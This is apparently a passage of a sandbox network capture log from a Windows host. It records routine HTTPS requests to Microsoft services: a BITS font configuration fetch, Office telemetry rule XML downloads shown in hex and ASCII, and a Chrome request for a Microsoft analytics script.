                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:45 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                                        2024-11-24 01:13:45 UTC478INHTTP/1.1 200 OK
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Server: Kestrel
                                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                        X-Ms-Region: prod-weu-z1
                                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                        X-OSID: 2
                                                                                                                                                                                        X-CID: 2
                                                                                                                                                                                        X-CCC: HK
                                                                                                                                                                                        Cache-Control: public, max-age=53279
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:45 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        X-CID: 2


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        61192.168.2.54978513.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:46 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:46 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                        x-ms-request-id: 6b91e280-c01e-00a2-4f0a-3d2327000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011346Z-178bfbc474btrnf9hC1NYCb80g00000005eg0000000069bx
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:46 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        62192.168.2.54978613.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:46 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:46 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                        ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                        x-ms-request-id: 43acaf28-701e-006f-5cf7-3cafc4000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011346Z-178bfbc474b9xljthC1NYCtw94000000053g00000000fhcc
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:46 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        63192.168.2.54978713.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:46 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:46 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                        ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                        x-ms-request-id: 1e280d2f-401e-0029-0d7f-3b9b43000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011346Z-174c587ffdfmrvb9hC1TEBtn3800000003q000000000gu3x
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:46 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        64192.168.2.54978813.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:46 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:46 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                        x-ms-request-id: 0fd64145-d01e-0028-790a-3d7896000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011346Z-178bfbc474bscnbchC1NYCe7eg00000005d000000000a70g
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:47 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        65192.168.2.54978913.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:46 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:46 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                        x-ms-request-id: 3585b350-301e-005d-097c-3be448000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011346Z-178bfbc474brk967hC1NYCfu600000000530000000006ern
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:47 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        66192.168.2.54979023.195.62.26443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:47 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                        Range: bytes=0-2147483646
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                                        2024-11-24 01:13:48 UTC456INHTTP/1.1 200 OK
                                                                                                                                                                                        ApiVersion: Distribute 1.1
                                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                        Server: ECAcc (hkc/BD20)
                                                                                                                                                                                        X-CID: 11
                                                                                                                                                                                        Cache-Control: public, max-age=168412
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:47 GMT
                                                                                                                                                                                        Content-Length: 55
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        X-CID: 2
                                                                                                                                                                                        2024-11-24 01:13:48 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        67192.168.2.54979413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:48 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:48 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 485
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB9769355"
                                                                                                                                                                                        x-ms-request-id: c2cadd2f-601e-0001-2bab-3bfaeb000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011348Z-15b8b599d882hxlwhC1TEBfa5w00000003k000000000fquq
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:48 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        68192.168.2.54979613.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:48 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:48 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:48 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 411
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                        ETag: "0x8DC582B989AF051"
                                                                                                                                                                                        x-ms-request-id: 8a5d0632-c01e-0046-08fc-3d2db9000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011348Z-178bfbc474bgvl54hC1NYCsfuw0000000580000000009bz3
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:48 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        69192.168.2.54979713.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:48 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:48 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 470
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                        ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                        x-ms-request-id: 43d09947-101e-005a-2421-3c882b000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011348Z-178bfbc474bbbqrhhC1NYCvw74000000059g00000000mp86
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:48 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        70192.168.2.54979513.107.246.634434276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:48 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                        Host: js.monitor.azure.com
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                        Referer: https://learn.microsoft.com/
                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                        2024-11-24 01:13:49 UTC868INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:48 GMT
                                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                        Content-Length: 207935
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                        Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                        ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                        x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                        x-ms-version: 2009-09-19
